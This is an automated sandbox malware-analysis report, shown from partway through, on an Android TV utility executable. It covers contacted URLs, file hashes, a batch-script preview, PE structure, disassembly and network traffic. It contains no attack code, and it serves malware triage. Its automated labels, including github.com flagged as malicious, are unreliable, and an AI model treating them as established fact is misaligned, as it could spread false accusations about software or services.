github.com | 140.82.121.4 | true | true | - | unknown
objects.githubusercontent.com | 185.199.108.133 | true | false | - | unknown
Name | Malicious | Antivirus Detection | Reputation
https://github.com/tenox7/cmdmax/releases/download/2.0/cmdmax-x86.exe | true | Virustotal 0%; Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://atvlauncher.trekgonewild.de/ | tmp8939.bat.0.dr | false | Virustotal 0%; Avira URL Cloud: safe | unknown
https://kutt.it/stn_bridge_atv | tmp8939.bat.0.dr | false | Virustotal 1%; Avira URL Cloud: safe | unknown
https://www.tdtchannels.com/listas | tmp8939.bat.0.dr | false | Virustotal 0%; Avira URL Cloud: safe | unknown
https://f-droid.org/repo/news.androidtv.launchonboot_12.apk | tmp8939.bat.0.dr | false | Virustotal 0%; Avira URL Cloud: safe | unknown
https://www.androidpolice.com/2021/01/30/how-to-remap-remote-buttons-take-screenshot-chromecast-with | tmp8939.bat.0.dr | false | Virustotal 0%; Avira URL Cloud: safe | unknown
https://github.com/0x192/universal-android-debloater/releases/download/%ver_debloater%/uad_gui-windo | tmp8939.bat.0.dr | false | Virustotal 0%; Avira URL Cloud: safe | unknown
https://github.com/0x192/universal-android-debloater/wiki/FAQ | tmp8939.bat.0.dr | false | Virustotal 0%; Avira URL Cloud: safe | unknown
https://iptv-org.github.io/ | tmp8939.bat.0.dr | false | Virustotal 0%; Avira URL Cloud: safe | unknown
https://github.com/c50 | svchost.exe, 0000000C.00000002.3240662557.000001C0DF2C6000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.reddit.com/r/AndroidTV/ | tmp8939.bat.0.dr | false | Virustotal 0%; Avira URL Cloud: safe | unknown
https://www.androidtv-guide.com/ | tmp8939.bat.0.dr | false | Virustotal 0%; Avira URL Cloud: safe | unknown
https://www.reddit.com/r/AndroidTV/comments/1ajkxbk/tool_allinone_tool_for_windows_android_tv_tools_ | Android TV Tools v3_ES.exe, 00000000.00000002.3239472165.0000000001484000.00000004.00000020.00020000.00000000.sdmp, tmp8939.bat.0.dr | false | Virustotal 0%; Avira URL Cloud: safe | unknown
https://xdaforums.com/attachments/google-installer_3-0-apk.6052043/ | tmp8939.bat.0.dr | false | Virustotal 2%; Avira URL Cloud: safe | unknown
https://g.live.com/odclientsettings/ProdV2.C: | svchost.exe, 0000000C.00000003.2009056822.000001C0DEFA0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.12.dr, edb.log.12.dr | false | URL Reputation: safe | unknown
https://gitlab.com/AuroraOSS/AuroraStore/uploads/ac32503aee88c6d1067dad57f3f92e09/AuroraStore_4.3.5. | tmp8939.bat.0.dr | false | Virustotal 0%; Avira URL Cloud: safe | unknown
https://play.google.com/store/apps/details?id=com.tdtchannels.player | tmp8939.bat.0.dr | false | Virustotal 0%; Avira URL Cloud: safe | unknown
https://github.com:443/tenox7/cmdmax/releases/download/2.0/cmdmax-x86.exe | svchost.exe, 0000000C.00000002.3240579838.000001C0DF260000.00000004.00000020.00020000.00000000.sdmp | false | Virustotal 0%; Avira URL Cloud: safe | unknown
https://api.github.com/repos/mirfatif/PermissionManagerX/releases/latest | tmp8939.bat.0.dr | false | Virustotal 0%; Avira URL Cloud: safe | unknown
https://xdaforums.com/attachments/aapt-arm-pie-zip.6053069/ | tmp8939.bat.0.dr | false | Virustotal 0%; Avira URL Cloud: safe | unknown
https://play.google.com/store/apps/details?id=flar2.homebutton | tmp8939.bat.0.dr | false | Virustotal 0%; Avira URL Cloud: safe | unknown
https://api.github.com/repos/K3V1991/ADB-and-FastbootPlusPlus/releases/latest | tmp8939.bat.0.dr | false | Virustotal 0%; Avira URL Cloud: safe | unknown
https://api.github.com/repos/codefaktor/FTVLaunchX/releases/latest | tmp8939.bat.0.dr | false | Virustotal 0%; Avira URL Cloud: safe | unknown
https://github.com/ | svchost.exe, 0000000C.00000002.3240453687.000001C0DF200000.00000004.00000020.00020000.00000000.sdmp | true | Virustotal 0%; Avira URL Cloud: safe | unknown
https://github.com/Genymobile/scrcpy/blob/master/doc/shortcuts.md#shortcuts | tmp8939.bat.0.dr | false | Virustotal 0%; Avira URL Cloud: safe | unknown
https://api.github.com/repos/spocky/miproja1/releases/latest | tmp8939.bat.0.dr | false | Virustotal 0%; Avira URL Cloud: safe | unknown
https://github.com/K3V1991/ADB-and-FastbootPlusPlus/releases/download/%ver_adb%/ADB-and-Fastboot | tmp8939.bat.0.dr | false | Virustotal 0%; Avira URL Cloud: safe | unknown
https://objects.githubusercontent.com/github-production-release-asset-2e65be/50417431/6e51c424-c3ca- | svchost.exe, 0000000C.00000002.3240662557.000001C0DF2E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3239974063.000001C0DA302000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://mirfatif.github.io/PermissionManagerX/ | tmp8939.bat.0.dr | false | Virustotal 0%; Avira URL Cloud: safe | unknown
https://api.github.com/repos/0x192/universal-android-debloater/releases | tmp8939.bat.0.dr | false | Virustotal 0%; Avira URL Cloud: safe | unknown
https://github.com/tenox7/cmdmax/releases/download/2.0/cmdmax-x86.exeAC: | edb.log.12.dr | false | Avira URL Cloud: safe | unknown
https://xdaforums.com/attachments/google-play-store_v38-7-29-apk.6052033/ | tmp8939.bat.0.dr | false | Virustotal 2%; Avira URL Cloud: safe | unknown
https://xdaforums.com/attachments/countries-list-txt.6067313/ | tmp8939.bat.0.dr | false | Virustotal 0%; Avira URL Cloud: safe | unknown
https://www.adslzone.net/reportajes/tv-streaming/que-es-tecnologia-iptv/#395576-que-son-las-listas-i | tmp8939.bat.0.dr | false | Virustotal 0%; Avira URL Cloud: safe | unknown
https://xdaforums.com/attachments/google-tv-home_1-0-591121582-apk.6051727/ | tmp8939.bat.0.dr | false | Virustotal 2%; Avira URL Cloud: safe | unknown
https://kutt.it/stn_bridge_amazon | tmp8939.bat.0.dr | false | Avira URL Cloud: safe | unknown
https://github.com/codefaktor/FTVLaunchX/releases/download/v1.0.1/FTVLaunchX-1.0.1.apk | tmp8939.bat.0.dr | false | Avira URL Cloud: safe | unknown
https://github.com/0x192/universal-android-debloater#universal-android-debloater-gui | tmp8939.bat.0.dr | false | Avira URL Cloud: safe | unknown
https://adguard.com/adguard-android-tv/overview.html | tmp8939.bat.0.dr | false | Avira URL Cloud: safe | unknown
https://api.github.com/repos/realOxy/M3UAndroid/releases/latest | tmp8939.bat.0.dr | false | Avira URL Cloud: safe | unknown
https://xdaforums.com/t/tool-all-in-one-tool-for-windows-android-tv-tools-v2.4648239/ | Android TV Tools v3_ES.exe, 00000000.00000002.3239472165.0000000001484000.00000004.00000020.00020000.00000000.sdmp, tmp8939.bat.0.dr | false | Avira URL Cloud: safe | unknown
https://9to5google.com/guides/android-tv/ | tmp8939.bat.0.dr | false | Avira URL Cloud: safe | unknown
https://play.google.com/store/apps/details?id=%%%%j | tmp8939.bat.0.dr | false | Avira URL Cloud: safe | unknown
https://play.google.com/store/apps/details?id=com.neilturner.aerialviews | tmp8939.bat.0.dr | false | Avira URL Cloud: safe | unknown
https://xdaforums.com/attachments/wifi-pro-ftp-server_v1-9-5-build-74-apk.5924749/ | tmp8939.bat.0.dr | false | Avira URL Cloud: safe | unknown
https://gitlab.com/flauncher/flauncher/-/releases/0.18.0/downloads/flauncher-0.18.0.apk | tmp8939.bat.0.dr | false | Avira URL Cloud: safe | unknown
https://play.google.com/store/apps/details?id=org.xbmc.kodi | tmp8939.bat.0.dr | false | Avira URL Cloud: safe | unknown
https://xdaforums.com/t/how-to-prepare-smartwatch-for-advanced-functions.4511103/ | tmp8939.bat.0.dr | false | Avira URL Cloud: safe | unknown
https://play.google.com/store/apps/details?id=ar.tvplayer.tv | tmp8939.bat.0.dr | false | Avira URL Cloud: safe | unknown
https://github.com/Genymobile/scrcpy | tmp8939.bat.0.dr | false | Avira URL Cloud: safe | unknown
https://api.github.com/repos/Genymobile/scrcpy/releases/latest | tmp8939.bat.0.dr | false | Avira URL Cloud: safe | unknown
https://github.com/codefaktor/FTVLaunchX/blob/develop/README.md | tmp8939.bat.0.dr | false | Avira URL Cloud: safe | unknown
http://crl.ver) | svchost.exe, 0000000C.00000002.3240453687.000001C0DF210000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://smarttubeapp.github.io/ | tmp8939.bat.0.dr | false | Avira URL Cloud: safe | unknown
https://github.com/Genymobile/scrcpy/releases/download/%ver_scrcpy%/scrcpy-win%arquitectura_windows% | tmp8939.bat.0.dr | false | Avira URL Cloud: safe | unknown
https://github.com/Free-TV/IPTV?tab=readme-ov-file#free-tv | tmp8939.bat.0.dr | false | Avira URL Cloud: safe | unknown
https://kutt.it/stn_beta | tmp8939.bat.0.dr | false | Avira URL Cloud: safe | unknown
https://ipinfo.io | tmp8939.bat.0.dr | false | URL Reputation: safe | unknown
https://play.google.com/store/apps/details?id=com.wiseplay | tmp8939.bat.0.dr | false | Avira URL Cloud: safe | unknown
https://g.live.com/odclientsettings/Prod/C: | edb.log.12.dr | false | URL Reputation: safe | unknown
https://xdaforums.com/attachments/google-play-apk.6050959/ | tmp8939.bat.0.dr | false | Avira URL Cloud: safe | unknown
https://xdaforums.com/c/android-tv.4276/ | tmp8939.bat.0.dr | false | Avira URL Cloud: safe | unknown
https://apkins.aptoide.com/AptoideTV-5.1.2.apk | tmp8939.bat.0.dr | false | Avira URL Cloud: safe | unknown
https://objects.githubusercontent.com:443 | svchost.exe, 0000000C.00000002.3240579838.000001C0DF260000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/K3V1991/ADB-and-FastbootPlusPlus | Android TV Tools v3_ES.exe, 00000000.00000002.3239472165.0000000001484000.00000004.00000020.00020000.00000000.sdmp, tmp8939.bat.0.dr | false | Avira URL Cloud: safe | unknown
https://github.com/iptv-org/iptv?tab=readme-ov-file#playlists | tmp8939.bat.0.dr | false | Avira URL Cloud: safe | unknown
http://agrd.io/tvapk | tmp8939.bat.0.dr | false | Avira URL Cloud: safe | unknown
https://objects.githubusercontent.com/ | svchost.exe, 0000000C.00000002.3240662557.000001C0DF2D1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3240579838.000001C0DF295000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://mirfatif.github.io/PermissionManagerX/help/en/ | tmp8939.bat.0.dr | false | Avira URL Cloud: safe | unknown
https://github.com/mirfatif/PermissionManagerX/releases/download/%ver_PMX%/PMX_%ver_PMX%.apk | tmp8939.bat.0.dr | false | Avira URL Cloud: safe | unknown
https://kutt.it/stn_stable | tmp8939.bat.0.dr | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
142.250.186.46 | google.com | United States | 15169 | GOOGLEUS | false
185.199.108.133 | objects.githubusercontent.com | Netherlands | 54113 | FASTLYUS | false
140.82.121.4 | github.com | United States | 36459 | GITHUBUS | true
IP
127.0.0.1
Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1447534
Start date and time:2024-05-25 20:58:07 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 33s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:18
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:Android TV Tools v3_ES.exe
Detection:MAL
Classification:mal88.troj.evad.winEXE@23/14@3/4
EGA Information:
  • Successful, ratio: 100%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 22
  • Number of non-executed functions: 19
Cookbook Comments:
  • Found application associated with file extension: .exe
  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
  • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
  • Not all processes were analyzed; the report is missing behavior information
  • Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description
14:58:55 | API Interceptor | 43x Sleep call for process: powershell.exe modified
14:58:56 | API Interceptor | 2x Sleep call for process: svchost.exe modified
                      Process:C:\Windows\System32\svchost.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):1310720
                      Entropy (8bit):0.8523269133583322
                      Encrypted:false
                      SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDug2:gJjJGtpTq2yv1AuNZRY3diu8iBVqFa
                      MD5:814D634641CD55C36DAD4F421CF04D76
                      SHA1:B015E27851F3EE020F3062F66EBA90513174485C
                      SHA-256:47F1028D26FC58C79396C41797C5F3DE2CCF440C65E67D1D162EF0F53A87B633
                      SHA-512:D851553E580862DBCC6A7BE78CB6CE61D6E935EF51D3217719405664C1BA4D4BB4A85663F6F73593EA12E48BD2CE40D3C9F0F6CCE0C83EC4DD276472083F3935
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\svchost.exe
                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0x530d4801, page size 16384, DirtyShutdown, Windows version 10.0
                      Category:dropped
                      Size (bytes):1310720
                      Entropy (8bit):0.6585572789694413
                      Encrypted:false
                      SSDEEP:1536:xSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:xaza9v5hYe92UOHDnAPZ4PZf9h/9h
                      MD5:0E34C95158D65A40F85B6D92386DC6E6
                      SHA1:1E2B42DCDCFC7F80B395885775026BA545AC192F
                      SHA-256:6DE87C16CAF7F826CC7B3A4D9652C4DDE7BF59308CEB2ADEC47C12F2CEEBEDC6
                      SHA-512:BA42959BC80E506C51850034CF2E6169FBB45B00DC1C5EEF760673E67833E94400DCC52269566DBD2FBEBBF8826F4646A15C093F0F32D84F564E6B67BA447A81
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\svchost.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):16384
                      Entropy (8bit):0.08179504249721575
                      Encrypted:false
                      SSDEEP:3:A1KYeqUcobr5ekGuAJkhvekl12qxZo/llAllrekGltll/SPj:A1KzIa5trxlUqfoAJe3l
                      MD5:524569E7F9A1FAB562B3192A53EB5B19
                      SHA1:45C125C2E5F7BD6FD058C28B6D1311D3B2FE9558
                      SHA-256:7965359BAF29CAAE09D43732FA57C7B8DB1B305C1EDDC4817BFB24C8AE14FF19
                      SHA-512:834F390724D87BD35706557AED13A3BFD620E8F41936272C97068B78A34CA64197F5BD06D368A5FB3C582737240B0F62EF4BD22A022DE72690CB5BEF5085127C
                      Malicious:false
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):2032
                      Entropy (8bit):5.549377431500846
                      Encrypted:false
                      SSDEEP:48:2TyFWSU4y4RQmFoUeUmfmZ9tK8NWR8sYdWwAR11XWKGEqD:CmLHyIFKLFOZ2KWHYdWbRbrPqD
                      MD5:0E4903CB589B46BA5361303251CE9E90
                      SHA1:3E5D54D8EAFE07AB5BBDDC506EB8BFE307B1A8D7
                      SHA-256:CA151D11CBF2C05FDBACEE7E0B7FA948FAFACB364EFDFDF9CA3437745F247E99
                      SHA-512:1AFD9B87DA8A37DEB6B8A16DDAFC761FFAAF6C40484A3F327733A9EC2F5BFE10DBBB7D95B777F7A321725DF3408C13C237C0B2B75D2807C461183A949E48901B
                      Malicious:false
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Users\user\Desktop\Android TV Tools v3_ES.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):15
                      Entropy (8bit):3.3735572622751855
                      Encrypted:false
                      SSDEEP:3:bO:bO
                      MD5:3C52638971EAD82B5929D605C1314EE0
                      SHA1:7318148A40FACA203AC402DFF51BBB04E638545C
                      SHA-256:5614459EC05FDF6110FA8CE54C34E859671EEFFBA2B7BB4B1AD6C2C6706855AB
                      SHA-512:46F85F730E3CA9A57F51416C6AB4D03F868F895568EEE8F7943CD249B2F71D2A3E83C34E7132715C983D3EFAA865A9CB599A4278C911130A0A6948A535C0573B
                      Malicious:false
                      Preview:RCHELICOPTERFTW
                      Process:C:\Users\user\Desktop\Android TV Tools v3_ES.exe
                      File Type:DOS batch file, Non-ISO extended-ASCII text, with very long lines (316), with CRLF line terminators
                      Category:dropped
                      Size (bytes):307953
                      Entropy (8bit):5.01261471757683
                      Encrypted:false
                      SSDEEP:1536:tsOVzDYf5qe5UFZjzy/jeGzMp9Y3YY2pdTY4RYnqQOcZ84NY5S9NHFCYHzh6B2up:t7Av1Ty5GRVQb8HhckeysOiY1puwp2z
                      MD5:E0663ED31DCB8219FBB39CB42C522C5F
                      SHA1:3F978EA061FC02AFBA80C475F272FAF40D583EA4
                      SHA-256:B3D5E8A85EA6C3DD9517ED4ED09FF9FDA25A322898473BE2BC60CCF7095C9679
                      SHA-512:7828F08711C32E02C32886CBAE5298BCDD74037005E6EE947C6692F5B5FC4890C442D125DE88263366EDF50A914D8101122E3A6590A919554B00E4C2003550CE
                      Malicious:true
                      Preview:@echo off..set ztmp=C:\Users\user\AppData\Local\Temp\ytmp..set MYFILES=C:\Users\user\AppData\Local\Temp\afolder..set bfcec=tmp4785.exe..set cmdline=..SHIFT /0..@echo off..:: Programado por bernarbernuli..:: Versi.n 3.0..:: 05 de febrero de 2024..::..:: changelog..:: v1.0 (29Dic23) - Versi.n inicial. 3706 lineas..:: v2.0 (05Feb24) - A.adidos nuevos enlaces de consulta. (opc 7.3) // corregido enlace de descarga drivers adb y driver aapt. // Mejorado m.todo de instalaci.n de Projectivy Launcher y FLauncher..:: Ahora siempre descarga la .ltima versi.n disponible de drivers ADB,Universal Android Debloater, scrcpy, SmartTube y Projectivy Launcher..:: a.adido acceso directo de Play Store para que se muestre en tu launcher (opc. 1.9)...:: Arreglado bloqueador de publicidad //A.adida 2. p.gina en opcion 7 (Otras herramientas) // a.adido instalar tiendas alternativas como Aurora Store y Aptoide TV (Opc 7.11)..:: A.adido inst
                      Process:C:\Windows\System32\svchost.exe
                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):27136
                      Entropy (8bit):5.805931866786917
                      Encrypted:false
                      SSDEEP:384:8qjyLkmCWzyQFqvf5J0rxzeDhLDooH6wkKmTJrFnO3OgGb+fn:7rSyQYvf5MiDqg6wkKmtlO+gjfn
                      MD5:34348DD557468D401AE4BFAE2E850EEE
                      SHA1:936CCC900EDFEC3EC50CB8F80669091966F33ECC
                      SHA-256:7027C3EAC1C4D4F3724262EBC1FE2443422BCE232F1634C3DE7AEBE9380770E5
                      SHA-512:096A1DBA362575BC2A03E59D441B4986F63521E255EC766EEC76D32E8C91601920F4AFB8C682E4CD75AF71CC41F94BFE46524216912DC77F6794C149463CC9F6
                      Malicious:false
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 2%
                      Process:C:\Windows\SysWOW64\PING.EXE
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):310
                      Entropy (8bit):5.014136067561851
                      Encrypted:false
                      SSDEEP:6:Pz3UMFSovmWxHLTIkmsWZLTNcwAFeMmvVOIHJFxMVlmJHaVFtIk3:PbLn5pTlms0DAFSkIrxMVlmJHaVPN
                      MD5:B4F12347F11C6C2673A2486563C22F82
                      SHA1:48A49F1D4840B38B6A0B50A113B4F5B3DA25D771
                      SHA-256:AD7BEE9CEC4FC653971A1449F29529A1A28F8D34F52F4012E91D253E08E49B99
                      SHA-512:D26306101C3B0AD6E5C9871D12F7218894490311EEB43F18848FE6B2EF40D69D388E7DD14A6AC23E2EDC11A16285DE82937EF59694279121CDD3204F014D96B8
                      Malicious:false
                      Preview:..Pinging google.com [142.250.186.46] with 32 bytes of data:..Reply from 142.250.186.46: bytes=32 time=6ms TTL=108....Ping statistics for 142.250.186.46:.. Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 6ms, Maximum = 6ms, Average = 6ms..
                      File type:PE32 executable (console) Intel 80386, for MS Windows
                      Entropy (8bit):6.88297916468759
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:Android TV Tools v3_ES.exe
                      File size:389'816 bytes
                      MD5:66773f373de9e1aa11b3f2e6f74967af
                      SHA1:cf366b0155f9ab7a2376191120e91bd241f2da8b
                      SHA256:0010eec766b8e255d945d0c5ed3ca892329892c4a106988159a26f8758b52282
                      SHA512:3f1fe9071a0f41cf09b931db5eca2c3f5d2eb8230b918cb89c33eea346154998c2f515229b184ab720ed3644a894cb8e3a6ffafbc53c05054993ab902adfcd16
                      SSDEEP:6144:SbY3pmGHPQ2khasL86OXEJOttcm4vH+NGytIW4h5U5Ai7gQ9:cY3pmGPK/LgXEJOttZ4P+NGytg5u
                      TLSH:A584175929767710E4C328F0859359954BF8CD1E230F9323EA526263AE3D93BECB5DE0
                      Icon Hash:4005646064656980
                      Entrypoint:0x406444
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows cui
                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      DLL Characteristics:
                      Time Stamp:0x53DD6401 [Sat Aug 2 22:19:45 2014 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:4
                      OS Version Minor:0
                      File Version Major:4
                      File Version Minor:0
                      Subsystem Version Major:4
                      Subsystem Version Minor:0
                      Import Hash:d247a55625cd61e3f91a266bce0cd371
                      Instruction
                      push ebp
                      mov ebp, esp
                      push FFFFFFFFh
                      push 0040D120h
                      push 00408A70h
                      mov eax, dword ptr fs:[00000000h]
                      push eax
                      mov dword ptr fs:[00000000h], esp
                      sub esp, 10h
                      push ebx
                      push esi
                      push edi
                      mov dword ptr [ebp-18h], esp
                      call dword ptr [0040D034h]
                      xor edx, edx
                      mov dl, ah
                      mov dword ptr [00415ED8h], edx
                      mov ecx, eax
                      and ecx, 000000FFh
                      mov dword ptr [00415ED4h], ecx
                      shl ecx, 08h
                      add ecx, edx
                      mov dword ptr [00415ED0h], ecx
                      shr eax, 10h
                      mov dword ptr [00415ECCh], eax
                      push 00000000h
                      call 00007FBD90702B5Fh
                      pop ecx
                      test eax, eax
                      jne 00007FBD907006CAh
                      push 0000001Ch
                      call 00007FBD9070075Fh
                      pop ecx
                      and dword ptr [ebp-04h], 00000000h
                      call 00007FBD907017C9h
                      call dword ptr [0040D030h]
                      mov dword ptr [00F0EE84h], eax
                      call 00007FBD90702A07h
                      mov dword ptr [00415F14h], eax
                      call 00007FBD907027B0h
                      call 00007FBD907026F2h
                      call 00007FBD906FFF75h
                      mov eax, dword ptr [00415EE8h]
                      mov dword ptr [00415EECh], eax
                      push eax
                      push dword ptr [00415EE0h]
                      push dword ptr [00415EDCh]
                      call 00007FBD906FB1CDh
                      add esp, 0Ch
                      mov dword ptr [ebp-1Ch], eax
                      push eax
                      call 00007FBD906FFF7Ah
                      mov eax, dword ptr [ebp-14h]
                      mov ecx, dword ptr [eax]
                      mov ecx, dword ptr [ecx]
                      Programming Language:
                      • [C++] VS98 (6.0) build 8168
                      • [ C ] VS98 (6.0) build 8168
                      • [RES] VS98 (6.0) cvtres build 1720
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0xd5c0 | 0x3c | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb0f000 | 0x3570 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0xd000 | 0x100 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0xbff6 | 0xc000 | 3d664f3f72f1bfbfc0d2510699e922c8 | False | 0.5731404622395834 | data | 6.540685415161986 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0xd000 | 0xb60 | 0x1000 | ec6ae981726c690fd83605a870e200cf | False | 0.351806640625 | data | 4.294764655260049 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0xe000 | 0xb00e98 | 0x2000 | 21f132633273eea3866c11b893eb656f | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0xb0f000 | 0x3570 | 0x4000 | fd19a8f2f19328b9cf5e11b74abe9bb3 | False | 0.106689453125 | data | 4.288504552239682 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_ICON | 0xb0f0f0 | 0x3228 | Device independent bitmap graphic, 64 x 128 x 24, image size 0, resolution 3780 x 3780 px/m | English | United States | 0.10186915887850467 |
| RT_GROUP_ICON | 0xb12318 | 0x14 | data | English | United States | 1.3 |
| RT_VERSION | 0xb1232c | 0x244 | data | | | 0.5103448275862069 |
DLL imports:
• KERNEL32.dll: GetTempPathA, GetModuleFileNameA, GetStdHandle, Sleep, SetConsoleCursorInfo, SetConsoleCursorPosition, SetConsoleTextAttribute, GetTickCount, GetConsoleMode, ExitProcess, TerminateProcess, GetCurrentProcess, GetCommandLineA, GetVersion, GetLastError, GetFileAttributesA, HeapFree, CloseHandle, SetFilePointer, SetHandleCount, GetFileType, GetStartupInfoA, WriteFile, ReadFile, GetProcAddress, GetModuleHandleA, UnhandledExceptionFilter, FreeEnvironmentStringsA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStrings, GetEnvironmentStringsW, HeapDestroy, HeapCreate, VirtualFree, RtlUnwind, HeapAlloc, GetExitCodeProcess, WaitForSingleObject, CreateProcessA, VirtualAlloc, HeapReAlloc, SetStdHandle, FlushFileBuffers, MultiByteToWideChar, GetStringTypeA, GetStringTypeW, CreateFileA, GetCPInfo, GetACP, GetOEMCP, LoadLibraryA, CompareStringA, CompareStringW, SetEnvironmentVariableA, SetEndOfFile, LCMapStringA, LCMapStringW, WriteConsoleA, ReadConsoleInputA, SetConsoleMode
• WINMM.dll: timeGetTime
| Language of compilation system | Country where language is spoken | Map |
|---|---|---|
| English | United States | |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| May 25, 2024 20:58:56.328916073 CEST | 64467 | 53 | 192.168.2.5 | 1.1.1.1 |
| May 25, 2024 20:58:56.337934017 CEST | 53 | 64467 | 1.1.1.1 | 192.168.2.5 |
| May 25, 2024 20:59:02.321845055 CEST | 62537 | 53 | 192.168.2.5 | 1.1.1.1 |
| May 25, 2024 20:59:02.350922108 CEST | 53 | 62537 | 1.1.1.1 | 192.168.2.5 |
| May 25, 2024 20:59:03.428020954 CEST | 60005 | 53 | 192.168.2.5 | 1.1.1.1 |
